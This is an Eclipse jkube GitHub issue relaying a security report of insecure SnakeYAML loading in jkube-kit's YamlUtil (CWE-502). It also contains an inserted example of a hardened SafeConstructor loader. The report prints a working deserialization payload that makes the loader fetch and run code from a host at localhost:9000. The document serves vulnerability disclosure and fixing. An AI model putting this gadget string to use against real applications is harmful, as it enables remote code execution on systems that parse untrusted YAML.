Bug 561261 - jkube-kit - insecure yaml load leading to RCE (CWE-502) #122

Closed
manusa opened this issue Mar 26, 2020 · 0 comments
manusa (Member) commented Mar 26, 2020

Description

Proxy issue for https://bugs.eclipse.org/bugs/show_bug.cgi?id=561261

From the Security Team Inbox:

--
https://github.com/eclipse/jkube/blob/master/jkube-kit/common/src/main/java/org/eclipse/jkube/kit/common/util/YamlUtil.java#L112 uses an insecure way to construct the Yaml object, leading to remote code execution. Here is sample code which would invoke malicious code hosted on localhost:9000.

String code = "maps: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:9000/\"]]]]";
YamlUtil.getPropertiesFromYamlString(code);

Please refer to SafeConstructor() and https://bitbucket.org/asomov/snakeyaml/wiki/Documentation#markdown-header-restrict-classes-to-be-loaded on using the API securely.

Reference: https://cwe.mitre.org/data/definitions/502.html
--

There's help for managing vulnerabilities in the handbook.

https://www.eclipse.org/projects/handbook/#vulnerability
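The fix the report points to, as an added example that is not the jkube project's own code: a loader built on SnakeYAML's `SafeConstructor` only constructs standard YAML types and refuses any `!!java...` global tag, so the document can never name a class to instantiate. The `SafeConstructor(LoaderOptions)` form used here exists in recent SnakeYAML 1.x and in 2.x; the no-argument `SafeConstructor()` named in the report is the 1.x form. The class name `SafeYamlDemo` and the sample documents are constructed for this example.

```java
import java.util.Map;
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class SafeYamlDemo {

    // Hardened loader. Unlike `new Yaml()`, which resolves global tags to
    // arbitrary classes on the classpath, SafeConstructor only knows how to
    // build maps, sequences and scalar types, and throws on any other tag.
    public static Map<String, Object> loadUntrusted(String yamlText) {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        return yaml.load(yamlText);
    }

    public static void main(String[] args) {
        // Constructed benign document: parses into an ordinary Map.
        System.out.println(loadUntrusted("maps:\n  key: value\n"));

        // Constructed document carrying a global tag of the kind shown in
        // the report: SafeConstructor rejects it instead of constructing it.
        String tagged = "maps: !!javax.script.ScriptEngineManager []\n";
        try {
            loadUntrusted(tagged);
            System.out.println("UNEXPECTED: tagged document was constructed");
        } catch (YAMLException e) {
            // ConstructorException ("could not determine a constructor for
            // the tag ...") is a YAMLException subclass.
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

Pair this with a bounded input size (via `LoaderOptions`) when the YAML comes from untrusted sources, since SafeConstructor addresses class instantiation, not resource exhaustion.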
@manusa manusa self-assigned this Mar 26, 2020
@manusa manusa added this to Planned in Sprint #181 Mar 26, 2020
@manusa manusa moved this from Planned to In Progress in Sprint #181 Mar 26, 2020
@manusa manusa moved this from In Progress to Review in Sprint #181 Mar 26, 2020
@manusa manusa closed this as completed Mar 26, 2020
@manusa manusa moved this from Review to Done in Sprint #181 Mar 26, 2020